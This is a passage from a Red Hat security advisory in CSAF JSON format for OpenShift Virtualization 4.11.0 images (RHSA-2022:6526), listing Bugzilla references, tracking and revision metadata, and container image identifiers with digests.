"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090059"
},
{
"category": "external",
"summary": "2090064",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090064"
},
{
"category": "external",
"summary": "2090066",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090066"
},
{
"category": "external",
"summary": "2090068",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090068"
},
{
"category": "external",
"summary": "2090131",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090131"
},
{
"category": "external",
"summary": "2090350",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090350"
},
{
"category": "external",
"summary": "2091003",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091003"
},
{
"category": "external",
"summary": "2091058",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091058"
},
{
"category": "external",
"summary": "2091309",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091309"
},
{
"category": "external",
"summary": "2091406",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091406"
},
{
"category": "external",
"summary": "2091754",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091754"
},
{
"category": "external",
"summary": "2091755",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091755"
},
{
"category": "external",
"summary": "2091756",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091756"
},
{
"category": "external",
"summary": "2091758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091758"
},
{
"category": "external",
"summary": "2091760",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091760"
},
{
"category": "external",
"summary": "2091761",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091761"
},
{
"category": "external",
"summary": "2091762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091762"
},
{
"category": "external",
"summary": "2091764",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091764"
},
{
"category": "external",
"summary": "2091765",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091765"
},
{
"category": "external",
"summary": "2091766",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091766"
},
{
"category": "external",
"summary": "2091853",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091853"
},
{
"category": "external",
"summary": "2091863",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091863"
},
{
"category": "external",
"summary": "2091868",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091868"
},
{
"category": "external",
"summary": "2091889",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091889"
},
{
"category": "external",
"summary": "2091897",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091897"
},
{
"category": "external",
"summary": "2091904",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091904"
},
{
"category": "external",
"summary": "2091911",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091911"
},
{
"category": "external",
"summary": "2091940",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091940"
},
{
"category": "external",
"summary": "2091945",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091945"
},
{
"category": "external",
"summary": "2091946",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091946"
},
{
"category": "external",
"summary": "2091982",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091982"
},
{
"category": "external",
"summary": "2092048",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092048"
},
{
"category": "external",
"summary": "2092052",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092052"
},
{
"category": "external",
"summary": "2092071",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092071"
},
{
"category": "external",
"summary": "2092079",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092079"
},
{
"category": "external",
"summary": "2092158",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092158"
},
{
"category": "external",
"summary": "2092228",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092228"
},
{
"category": "external",
"summary": "2092230",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092230"
},
{
"category": "external",
"summary": "2092306",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092306"
},
{
"category": "external",
"summary": "2092337",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092337"
},
{
"category": "external",
"summary": "2092359",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092359"
},
{
"category": "external",
"summary": "2092654",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092654"
},
{
"category": "external",
"summary": "2092662",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092662"
},
{
"category": "external",
"summary": "2092663",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092663"
},
{
"category": "external",
"summary": "2092664",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092664"
},
{
"category": "external",
"summary": "2092781",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092781"
},
{
"category": "external",
"summary": "2092783",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092783"
},
{
"category": "external",
"summary": "2092787",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092787"
},
{
"category": "external",
"summary": "2092789",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092789"
},
{
"category": "external",
"summary": "2092951",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092951"
},
{
"category": "external",
"summary": "2093282",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093282"
},
{
"category": "external",
"summary": "2093691",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093691"
},
{
"category": "external",
"summary": "2093713",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093713"
},
{
"category": "external",
"summary": "2093715",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093715"
},
{
"category": "external",
"summary": "2093716",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093716"
},
{
"category": "external",
"summary": "2093772",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093772"
},
{
"category": "external",
"summary": "2093773",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093773"
},
{
"category": "external",
"summary": "2093866",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093866"
},
{
"category": "external",
"summary": "2093867",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093867"
},
{
"category": "external",
"summary": "2094202",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094202"
},
{
"category": "external",
"summary": "2094207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094207"
},
{
"category": "external",
"summary": "2094208",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094208"
},
{
"category": "external",
"summary": "2094217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094217"
},
{
"category": "external",
"summary": "2094222",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094222"
},
{
"category": "external",
"summary": "2094323",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094323"
},
{
"category": "external",
"summary": "2094405",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094405"
},
{
"category": "external",
"summary": "2094440",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094440"
},
{
"category": "external",
"summary": "2094451",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094451"
},
{
"category": "external",
"summary": "2094453",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094453"
},
{
"category": "external",
"summary": "2094465",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094465"
},
{
"category": "external",
"summary": "2094471",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094471"
},
{
"category": "external",
"summary": "2094481",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094481"
},
{
"category": "external",
"summary": "2094486",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094486"
},
{
"category": "external",
"summary": "2094491",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094491"
},
{
"category": "external",
"summary": "2094495",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094495"
},
{
"category": "external",
"summary": "2094646",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094646"
},
{
"category": "external",
"summary": "2094665",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094665"
},
{
"category": "external",
"summary": "2094678",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094678"
},
{
"category": "external",
"summary": "2094727",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094727"
},
{
"category": "external",
"summary": "2094807",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094807"
},
{
"category": "external",
"summary": "2094813",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094813"
},
{
"category": "external",
"summary": "2094848",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094848"
},
{
"category": "external",
"summary": "2095125",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095125"
},
{
"category": "external",
"summary": "2095129",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095129"
},
{
"category": "external",
"summary": "2095224",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095224"
},
{
"category": "external",
"summary": "2095529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095529"
},
{
"category": "external",
"summary": "2095530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095530"
},
{
"category": "external",
"summary": "2095532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095532"
},
{
"category": "external",
"summary": "2095537",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095537"
},
{
"category": "external",
"summary": "2095570",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095570"
},
{
"category": "external",
"summary": "2095573",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095573"
},
{
"category": "external",
"summary": "2095953",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095953"
},
{
"category": "external",
"summary": "2095955",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095955"
},
{
"category": "external",
"summary": "2096166",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096166"
},
{
"category": "external",
"summary": "2096206",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096206"
},
{
"category": "external",
"summary": "2096208",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096208"
},
{
"category": "external",
"summary": "2096263",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096263"
},
{
"category": "external",
"summary": "2096333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096333"
},
{
"category": "external",
"summary": "2096492",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096492"
},
{
"category": "external",
"summary": "2096502",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096502"
},
{
"category": "external",
"summary": "2096510",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096510"
},
{
"category": "external",
"summary": "2096511",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096511"
},
{
"category": "external",
"summary": "2096620",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096620"
},
{
"category": "external",
"summary": "2096781",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096781"
},
{
"category": "external",
"summary": "2096801",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096801"
},
{
"category": "external",
"summary": "2096845",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096845"
},
{
"category": "external",
"summary": "2097328",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097328"
},
{
"category": "external",
"summary": "2097370",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097370"
},
{
"category": "external",
"summary": "2097465",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097465"
},
{
"category": "external",
"summary": "2097586",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097586"
},
{
"category": "external",
"summary": "2098134",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2098134"
},
{
"category": "external",
"summary": "2098135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2098135"
},
{
"category": "external",
"summary": "2098282",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2098282"
},
{
"category": "external",
"summary": "2099443",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099443"
},
{
"category": "external",
"summary": "2099533",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099533"
},
{
"category": "external",
"summary": "2099535",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099535"
},
{
"category": "external",
"summary": "2099539",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099539"
},
{
"category": "external",
"summary": "2099566",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099566"
},
{
"category": "external",
"summary": "2099608",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099608"
},
{
"category": "external",
"summary": "2099633",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099633"
},
{
"category": "external",
"summary": "2099639",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099639"
},
{
"category": "external",
"summary": "2099802",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099802"
},
{
"category": "external",
"summary": "2100054",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100054"
},
{
"category": "external",
"summary": "2100284",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100284"
},
{
"category": "external",
"summary": "2100415",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100415"
},
{
"category": "external",
"summary": "2100495",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100495"
},
{
"category": "external",
"summary": "2101164",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101164"
},
{
"category": "external",
"summary": "2101192",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101192"
},
{
"category": "external",
"summary": "2101430",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101430"
},
{
"category": "external",
"summary": "2101454",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101454"
},
{
"category": "external",
"summary": "2101485",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101485"
},
{
"category": "external",
"summary": "2101628",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101628"
},
{
"category": "external",
"summary": "2101954",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101954"
},
{
"category": "external",
"summary": "2102076",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102076"
},
{
"category": "external",
"summary": "2102116",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102116"
},
{
"category": "external",
"summary": "2102117",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102117"
},
{
"category": "external",
"summary": "2102122",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102122"
},
{
"category": "external",
"summary": "2102124",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102124"
},
{
"category": "external",
"summary": "2102125",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102125"
},
{
"category": "external",
"summary": "2102127",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102127"
},
{
"category": "external",
"summary": "2102129",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102129"
},
{
"category": "external",
"summary": "2102131",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102131"
},
{
"category": "external",
"summary": "2102135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102135"
},
{
"category": "external",
"summary": "2102143",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102143"
},
{
"category": "external",
"summary": "2102256",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102256"
},
{
"category": "external",
"summary": "2102448",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102448"
},
{
"category": "external",
"summary": "2102543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102543"
},
{
"category": "external",
"summary": "2102544",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102544"
},
{
"category": "external",
"summary": "2102545",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102545"
},
{
"category": "external",
"summary": "2104617",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104617"
},
{
"category": "external",
"summary": "2106175",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2106175"
},
{
"category": "external",
"summary": "2106258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2106258"
},
{
"category": "external",
"summary": "2110178",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2110178"
},
{
"category": "external",
"summary": "2111359",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111359"
},
{
"category": "external",
"summary": "2111562",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111562"
},
{
"category": "external",
"summary": "2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6526.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update",
"tracking": {
"current_release_date": "2024-11-25T13:35:45+00:00",
"generator": {
"date": "2024-11-25T13:35:45+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2022:6526",
"initial_release_date": "2022-09-14T19:28:51+00:00",
"revision_history": [
{
"date": "2022-09-14T19:28:51+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2022-09-14T19:28:51+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-25T13:35:45+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "CNV 4.11 for RHEL 8",
"product": {
"name": "CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:container_native_virtualization:4.11::el8"
}
}
}
],
"category": "product_family",
"name": "OpenShift Virtualization"
},
{
"branches": [
{
"category": "product_version",
"name": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"product": {
"name": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"product_id": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/bridge-marker\u0026tag=v4.11.0-26"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"product": {
"name": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"product_id": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"product_identification_helper": {
"purl": "pkg:oci/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/checkup-framework\u0026tag=v4.11.0-67"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"product": {
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"product_id": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator\u0026tag=v4.11.0-26"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"product": {
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"product_id": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins\u0026tag=v4.11.0-26"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"product": {
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"product_id": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8\u0026tag=v4.11.0-63"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"product": {
"name": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"product_id": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry\u0026tag=v4.11.0-601"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"product": {
"name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"product_id": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8\u0026tag=v4.11.0-21"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"product": {
"name": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"product_id": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver\u0026tag=v4.11.0-21"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"product": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"product_id": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8\u0026tag=v4.11.0-21"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"product": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"product_id": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator\u0026tag=v4.11.0-24"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"product": {
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"product_id": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator\u0026tag=v4.11.0-96"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"product": {
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"product_id": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8\u0026tag=v4.11.0-96"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"product": {
"name": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"product_id": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubemacpool\u0026tag=v4.11.0-26"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"product_id": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin\u0026tag=v4.11.0-83"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
